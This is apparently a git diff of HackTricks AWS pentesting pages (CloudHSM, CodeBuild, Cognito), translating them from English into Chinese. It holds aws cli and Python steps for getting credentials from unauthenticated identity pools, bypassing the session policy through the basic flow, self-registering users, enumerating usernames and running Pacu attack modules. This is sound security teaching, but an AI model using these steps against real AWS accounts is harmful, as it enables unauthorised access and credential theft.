keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance. 
+**CloudHSM 的成本明显高于密钥管理服务**。CloudHSM 是一个硬件设备,因此您需要固定成本来配置 CloudHSM 设备,然后是运行该设备的每小时费用。目前每小时的费用为 1.88 美元,或每月大约 1,373 美元。 -**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you. +使用 CloudHSM 的最常见原因是您必须满足的合规标准。**KMS 不支持非对称密钥的数据支持。CloudHSM 允许您安全地存储非对称密钥**。 -### CloudHSM Suggestions +**公钥在配置期间安装在 HSM 设备上**,因此您可以通过 SSH 访问 CloudHSM 实例。 -1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS. -2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data. -3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear. -4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed. -5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool. -6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance. -7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source. +### 什么是硬件安全模块 -The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month. +硬件安全模块(HSM)是一个专用的加密设备,用于生成、存储和管理加密密钥并保护敏感数据。它旨在通过物理和电子隔离加密功能与系统的其余部分来提供高水平的安全性。 -The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**. +HSM 的工作方式可能因具体型号和制造商而异,但通常会发生以下步骤: -The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH. +1. **密钥生成**:HSM 使用安全随机数生成器生成随机加密密钥。 +2. **密钥存储**:密钥 **安全地存储在 HSM 内部,只有授权用户或进程才能访问**。 +3. **密钥管理**:HSM 提供一系列密钥管理功能,包括密钥轮换、备份和撤销。 +4. **加密操作**:HSM 执行一系列加密操作,包括加密、解密、数字签名和密钥交换。这些操作在 HSM 的安全环境中 **执行,保护免受未经授权的访问和篡改**。 +5. 
**审计日志**:HSM 记录所有加密操作和访问尝试,可用于合规性和安全审计目的。 -### What is a Hardware Security Module +HSM 可用于广泛的应用,包括安全在线交易、数字证书、安全通信和数据加密。它们通常用于需要高安全性水平的行业,如金融、医疗保健和政府。 -A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system. - -The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur: - -1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator. -2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**. -3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation. -4. **Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering. -5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes. - -HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government. - -Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure. - -### Enumeration +总体而言,HSM 提供的高安全性使得 **从中提取原始密钥非常困难,尝试这样做通常被视为安全漏洞**。然而,可能存在 **某些场景**,在这些场景中,**授权人员可以提取原始密钥**,例如在密钥恢复程序的情况下。 +### 枚举 ``` TODO ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md index bd54cd791..0759c9261 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md @@ -4,30 +4,29 @@ ## CodeBuild -AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass: +AWS **CodeBuild** 被认为是一个 **完全托管的持续集成服务**。该服务的主要目的是自动化编译源代码、执行测试和打包软件以便于部署的过程。CodeBuild 提供的主要好处在于它能够减轻用户配置、管理和扩展构建服务器的需求。这种便利性是因为该服务本身管理这些任务。AWS CodeBuild 的基本功能包括: -1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance. -2. 
**Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process. -3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment. +1. **托管服务**:CodeBuild 管理和扩展构建服务器,使用户免于服务器维护。 +2. **持续集成**:它与开发和部署工作流程集成,自动化软件发布过程中的构建和测试阶段。 +3. **包生产**:在构建和测试阶段之后,它准备软件包,使其准备好进行部署。 -AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability. +AWS CodeBuild 与其他 AWS 服务无缝集成,提高了 CI/CD(持续集成/持续部署)管道的效率和可靠性。 -### **Github/Gitlab/Bitbucket Credentials** +### **Github/Gitlab/Bitbucket 凭证** -#### **Default source credentials** +#### **默认源凭证** -This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials. +这是一个遗留选项,可以配置一些 **访问**(如 Github 令牌或应用程序),这些访问将 **在 codebuild 项目之间共享**,以便所有项目都可以使用这组配置的凭证。 -The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs. +存储的凭证(令牌、密码等)由 **codebuild 管理**,并且没有任何公共方式可以通过 AWS API 检索它们。 -#### Custom source credential +#### 自定义源凭证 -Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**. +根据存储库平台(Github、Gitlab 和 Bitbucket),提供不同的选项。但一般来说,任何需要 **存储令牌或密码的选项都将作为秘密存储在秘密管理器中**。 -This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one. +这允许 **不同的 codebuild 项目使用不同配置的访问** 提供者,而不仅仅是使用配置的默认访问。 ### Enumeration - ```bash # List external repo creds (such as github tokens) ## It doesn't return the token but just the ARN where it's located @@ -48,10 +47,9 @@ aws codebuild list-build-batches-for-project --project-name aws codebuild list-reports aws codebuild describe-test-cases --report-arn ``` - ### Privesc -In the following page, you can check how to **abuse codebuild permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用codebuild权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-codebuild-privesc.md @@ -74,7 +72,3 @@ In the following page, you can check how to **abuse codebuild permissions to esc - [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md index c870c1791..956cff7a3 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md @@ -4,31 +4,30 @@ ## Cognito -Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. 
+Amazon Cognito 用于 **身份验证、授权和用户管理** 在网络和移动应用程序中。它允许用户灵活地直接使用 **用户名和密码** 登录,或通过 **第三方** 间接登录,包括 Facebook、Amazon、Google 或 Apple。 -Central to Amazon Cognito are two primary components: +Amazon Cognito 的核心是两个主要组件: -1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. -2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. +1. **用户池**:这些是为您的应用用户设计的目录,提供 **注册和登录功能**。 +2. **身份池**:这些池在 **授权用户访问不同的 AWS 服务** 中发挥重要作用。它们并不直接参与登录或注册过程,但在身份验证后对资源访问至关重要。 -### **User pools** +### **用户池** -To learn what is a **Cognito User Pool check**: +要了解什么是 **Cognito 用户池检查**: {{#ref}} cognito-user-pools.md {{#endref}} -### **Identity pools** +### **身份池** -The learn what is a **Cognito Identity Pool check**: +要了解什么是 **Cognito 身份池检查**: {{#ref}} cognito-identity-pools.md {{#endref}} -## Enumeration - +## 枚举 ```bash # List Identity Pools aws cognito-identity list-identity-pools --max-results 60 @@ -72,35 +71,30 @@ aws cognito-idp get-user-pool-mfa-config --user-pool-id ## Get risk configuration aws cognito-idp describe-risk-configuration --user-pool-id ``` +### 身份池 - 未认证枚举 -### Identity Pools - Unauthenticated Enumeration +仅仅**知道身份池ID**,您可能能够**获取与未认证**用户(如果有的话)相关联的角色的凭证。[**查看方法**](cognito-identity-pools.md#accessing-iam-roles)。 -Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles). +### 用户池 - 未认证枚举 -### User Pools - Unauthenticated Enumeration +即使您**不知道Cognito中的有效用户名**,您也可能能够**枚举**有效的**用户名**,**暴力破解****密码**,甚至**注册新用户**,只需**知道应用客户端ID**(通常在源代码中找到)。[**查看方法**](cognito-user-pools.md#registration)**.** -Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.** - -## Privesc +## 权限提升 {{#ref}} ../../aws-privilege-escalation/aws-cognito-privesc.md {{#endref}} -## Unauthenticated Access +## 未认证访问 {{#ref}} ../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md {{#endref}} -## Persistence +## 持久性 {{#ref}} ../../aws-persistence/aws-cognito-persistence.md {{#endref}} {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md index 024c7ea91..0c73383a2 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md @@ -2,16 +2,15 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. 
The supported identity providers include: - -- Amazon Cognito user pools -- Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple -- Providers compliant with OpenID Connect (OIDC) -- SAML (Security Assertion Markup Language) identity providers -- Developer authenticated identities +身份池通过使您的用户能够**获取临时凭证**,在其中发挥着至关重要的作用。这些凭证对于访问各种AWS服务至关重要,包括但不限于Amazon S3和DynamoDB。身份池的一个显著特点是它们支持匿名访客用户以及多种身份提供者进行用户身份验证。支持的身份提供者包括: +- Amazon Cognito用户池 +- 社交登录选项,如Facebook、Google、使用Amazon登录和使用Apple登录 +- 符合OpenID Connect (OIDC)的提供者 +- SAML (安全声明标记语言)身份提供者 +- 开发者认证身份 ```python # Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows: import boto3 @@ -24,74 +23,64 @@ identity_pool_id = 'your-identity-pool-id' # Add an identity provider to the identity pool response = client.set_identity_pool_roles( - IdentityPoolId=identity_pool_id, - Roles={ - 'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole', - 'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole', - } +IdentityPoolId=identity_pool_id, +Roles={ +'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole', +'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole', +} ) # Print the response from AWS print(response) ``` - ### Cognito Sync -To generate Identity Pool sessions, you first need to **generate and Identity ID**. This Identity ID is the **identification of the session of that user**. These identifications can have up to 20 datasets that can store up to 1MB of key-value pairs. +要生成身份池会话,您首先需要**生成身份 ID**。这个身份 ID 是**该用户会话的标识**。这些标识可以有多达 20 个数据集,可以存储多达 1MB 的键值对。 -This is **useful to keep information of a user** (who will be always using the same Identity ID). +这对于**保持用户信息**(将始终使用相同的身份 ID)是**有用的**。 -Moreover, the service **cognito-sync** is the service that allow to **manage and syncronize this information** (in the datasets, sending info in streams and SNSs msgs...). +此外,服务**cognito-sync**是允许**管理和同步这些信息**的服务(在数据集中,发送信息到流和 SNS 消息...)。 ### Tools for pentesting -- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +- [Pacu](https://github.com/RhinoSecurityLabs/pacu),AWS 利用框架,现在包括“cognito\_\_enum”和“cognito\_\_attack”模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的 ID 令牌等的权限提升。 -For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. 
+有关模块功能的描述,请参见[博客文章](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2)的第 2 部分。有关安装说明,请参见主 [Pacu](https://github.com/RhinoSecurityLabs/pacu) 页面。 #### Usage -Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: - +示例 cognito\_\_attack 用法,尝试在给定身份池和用户池客户端上进行用户创建和所有权限提升向量: ```bash Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: - +示例 cognito\_\_enum 用法,以收集当前 AWS 账户中可见的所有用户池、用户池客户端、身份池、用户等: ```bash Pacu (new:test) > run cognito__enum ``` +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) 是一个用 Python 编写的 CLI 工具,实施对 Cognito 的不同攻击,包括不必要的账户创建和身份池升级。 -- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation. - -#### Installation - +#### 安装 ```bash $ pip install cognito-scanner ``` - -#### Usage - +#### 用法 ```bash $ cognito-scanner --help ``` - For more information check https://github.com/padok-team/cognito-scanner -## Accessing IAM Roles +## 访问 IAM 角色 -### Unauthenticated +### 未认证 -The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable). +攻击者需要知道的唯一信息是 **在 Cognito 应用中获取 AWS 凭证** 的 **身份池 ID**,并且这个 **ID 必须硬编码** 在 web/mobile **应用程序** 中以供使用。一个 ID 看起来像这样:`eu-west-1:098e5341-8364-038d-16de-1865e435da3b`(它无法通过暴力破解获得)。 > [!TIP] -> The **IAM Cognito unathenticated role created via is called** by default `Cognito_Unauth_Role` - -If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with: +> 通过创建的 **IAM Cognito 未认证角色默认被称为** `Cognito_Unauth_Role` +如果你发现一个硬编码的身份池 ID 并且它允许未认证用户,你可以通过以下方式获取 AWS 凭证: ```python import requests @@ -105,8 +94,8 @@ r = requests.post(url, json=params, headers=headers) json_resp = r.json() if not "IdentityId" in json_resp: - print(f"Not valid id: {id_pool_id}") - exit +print(f"Not valid id: {id_pool_id}") +exit IdentityId = r.json()["IdentityId"] @@ -117,23 +106,19 @@ r = requests.post(url, json=params, headers=headers) print(r.json()) ``` - -Or you could use the following **aws cli commands**: - +或者你可以使用以下 **aws cli 命令**: ```bash aws cognito-identity get-id --identity-pool-id --no-sign aws cognito-identity get-credentials-for-identity --identity-id --no-sign ``` - > [!WARNING] -> Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section. +> 请注意,默认情况下,未经身份验证的 cognito **用户无法拥有任何权限,即使通过策略分配了权限**。请查看以下部分。 -### Enhanced vs Basic Authentication flow +### 增强与基本身份验证流程 -The previous section followed the **default enhanced authentication flow**. This flow sets a **restrictive** [**session policy**](../../aws-basic-information/#session-policies) to the IAM role session generated. 
This policy will only allow the session to [**use the services from this list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (even if the role had access to other services). - -However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**. +上一部分遵循了 **默认增强身份验证流程**。此流程为生成的 IAM 角色会话设置了 **限制性** [**会话策略**](../../aws-basic-information/#session-policies)。该策略仅允许会话 [**使用此列表中的服务**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services)(即使该角色可以访问其他服务)。 +然而,如果 **身份池启用了“基本(经典)流程”**,则有一种方法可以绕过此限制,用户将能够使用该流程获取会话,而该会话 **将没有限制性会话策略**。 ```bash # Get auth ID aws cognito-identity get-id --identity-pool-id --no-sign @@ -145,51 +130,46 @@ aws cognito-identity get-open-id-token --identity-id --no-sign ## If you don't know the role_arn use the previous enhanced flow to get it aws sts assume-role-with-web-identity --role-arn "arn:aws:iam:::role/" --role-session-name sessionname --web-identity-token --no-sign ``` - > [!WARNING] -> If you receive this **error**, it's because the **basic flow is not enabled (default)** +> 如果您收到此 **错误**,则是因为 **基本流程未启用(默认)** > `An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.` -Having a set of IAM credentials you should check [which access you have](../../#whoami) and try to [escalate privileges](../../aws-privilege-escalation/). +拥有一组 IAM 凭证后,您应该检查 [您拥有的访问权限](../../#whoami) 并尝试 [提升权限](../../aws-privilege-escalation/)。 -### Authenticated +### 已认证 > [!NOTE] -> Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials. +> 请记住,**已认证用户**可能会被授予 **不同的权限**,因此如果您可以 **在应用程序内注册**,请尝试这样做并获取新凭证。 -There could also be **roles** available for **authenticated users accessing the Identity Poo**l. +对于 **访问身份池的已认证用户**,可能还有 **角色** 可用。 -For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**. +为此,您可能需要访问 **身份提供者**。如果是 **Cognito 用户池**,也许您可以利用默认行为 **自己创建一个新用户**。 > [!TIP] -> The **IAM Cognito athenticated role created via is called** by default `Cognito_Auth_Role` +> 通过创建的 **IAM Cognito 认证角色** 默认称为 `Cognito_Auth_Role` -Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured). +无论如何,**以下示例**假设您已经在用于访问身份池的 **Cognito 用户池** 中登录(不要忘记,其他类型的身份提供者也可以被配置)。
aws cognito-identity get-id \
-    --identity-pool-id <identity_pool_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+    --identity-pool-id <identity_pool_id> \
+    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
-# Get the identity_id from the previous commnad response
+# 从上一个命令响应中获取 identity_id
 aws cognito-identity get-credentials-for-identity \
-    --identity-id <identity_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+    --identity-id <identity_id> \
+    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
 
-# In the IdToken you can find roles a user has access because of User Pool Groups
-# User the --custom-role-arn to get credentials to a specific role
+# 在 IdToken 中,您可以找到用户因用户池组而拥有的角色
+# 使用 --custom-role-arn 获取特定角色的凭证
 aws cognito-identity get-credentials-for-identity \
-    --identity-id <identity_id> \
+    --identity-id <identity_id> \
     --custom-role-arn <role_arn> \
     --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
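
# Sketch: export the temporary credentials returned in the "Credentials" object
# (Cognito names the secret "SecretKey") and verify which principal you obtained
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretKey>
export AWS_SESSION_TOKEN=<SessionToken>
aws sts get-caller-identity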
 
> [!WARNING] -> It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**. +> 可以 **根据用户登录的身份提供者** 配置不同的 IAM 角色,甚至仅仅根据 **用户**(使用声明)。因此,如果您通过相同或不同的提供者访问不同的用户,可能 **值得登录并访问他们所有的 IAM 角色**。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md index 08e06fb45..03e6dae33 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md @@ -1,33 +1,32 @@ -# Cognito User Pools +# Cognito 用户池 {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. +用户池是 Amazon Cognito 中的用户目录。通过用户池,您的用户可以通过 Amazon Cognito **登录到您的网页或移动应用**,**或通过** **第三方** 身份提供者 (IdP) 进行联合身份验证。无论您的用户是直接登录还是通过第三方,所有用户池的成员都有一个可以通过 SDK 访问的目录配置文件。 -User pools provide: +用户池提供: -- Sign-up and sign-in services. -- A built-in, customizable web UI to sign in users. -- Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. -- User directory management and user profiles. -- Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. -- Customized workflows and user migration through AWS Lambda triggers. +- 注册和登录服务。 +- 内置的、可自定义的网页用户界面以登录用户。 +- 通过 Facebook、Google、Amazon 登录和 Apple 登录的社交登录,以及通过用户池中的 SAML 和 OIDC 身份提供者。 +- 用户目录管理和用户配置文件。 +- 安全功能,如多因素身份验证 (MFA)、对被泄露凭证的检查、账户接管保护,以及电话和电子邮件验证。 +- 通过 AWS Lambda 触发器自定义工作流和用户迁移。 -**Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool. +**应用程序的源代码** 通常还会包含 **用户池 ID** 和 **客户端应用程序 ID**(有时还有 **应用程序密钥**?),这些都是 **用户登录** Cognito 用户池所需的。 -### Potential attacks +### 潜在攻击 -- **Registration**: By default a user can register himself, so he could create a user for himself. -- **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack. -- **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**. 
+- **注册**:默认情况下,用户可以自我注册,因此他可以为自己创建一个用户。 +- **用户枚举**:注册功能可用于查找已存在的用户名。这些信息对于暴力破解攻击可能很有用。 +- **登录暴力破解**:在 [**身份验证**](cognito-user-pools.md#authentication) 部分,您可以找到用户 **登录** 的所有 **方法**,您可以尝试暴力破解它们以 **找到有效凭证**。 -### Tools for pentesting - -- [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\ - For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. +### 渗透测试工具 +- [Pacu](https://github.com/RhinoSecurityLabs/pacu),现在包括 `cognito__enum` 和 `cognito__attack` 模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的 ID 令牌等的权限提升。\ +有关模块功能的描述,请参见 [博客文章](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2) 的第 2 部分。有关安装说明,请参见主 [Pacu](https://github.com/RhinoSecurityLabs/pacu) 页面。 ```bash # Run cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account Pacu (new:test) > run cognito__enum @@ -37,201 +36,169 @@ Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gma us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info. - +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) 是一个用 Python 编写的 CLI 工具,实施对 Cognito 的不同攻击,包括不必要的账户创建和账户 oracle。有关更多信息,请查看 [this link](https://github.com/padok-team/cognito-scanner)。 ```bash # Install pip install cognito-scanner # Run cognito-scanner --help ``` - -- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users. - +- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): 该脚本允许枚举用户的有效属性。 ```bash python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl ``` +## 注册 -## Registration - -User Pools allows by **default** to **register new users**. 
- +用户池默认允许**注册新用户**。 ```bash aws cognito-idp sign-up --client-id \ - --username --password \ - --region --no-sign-request +--username --password \ +--region --no-sign-request ``` +#### 如果任何人都可以注册 -#### If anyone can register - -You might find an error indicating you that you need to **provide more details** of abut the user: - +您可能会发现一个错误,指示您需要**提供更多关于用户的详细信息**: ``` An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: address: The attribute is required ``` - -You can provide the needed details with a JSON such as: - +您可以提供所需的详细信息,格式为 JSON,例如: ```json --user-attributes '[{"Name": "email", "Value": "carlospolop@gmail.com"}, {"Name":"gender", "Value": "M"}, {"Name": "address", "Value": "street"}, {"Name": "custom:custom_name", "Value":"supername&\"*$"}]' ``` - -You could use this functionality also to **enumerate existing users.** This is the error message when a user already exists with that name: - +您还可以使用此功能来**枚举现有用户。** 当已存在该名称的用户时,错误消息为: ``` An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists ``` - > [!NOTE] -> Note in the previous command how the **custom attributes start with "custom:"**.\ -> Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**. - -Or just to test if a client id exists. This is the error if the client-id doesn't exist: +> 注意在之前的命令中,**自定义属性以 "custom:" 开头**。\ +> 还要知道,在注册时,您**无法为用户创建新的自定义属性**。您只能为**默认属性**(即使它们不是必需的)和**指定的自定义属性**赋值。 +或者只是测试客户端 ID 是否存在。如果客户端 ID 不存在,则会出现此错误: ``` An error occurred 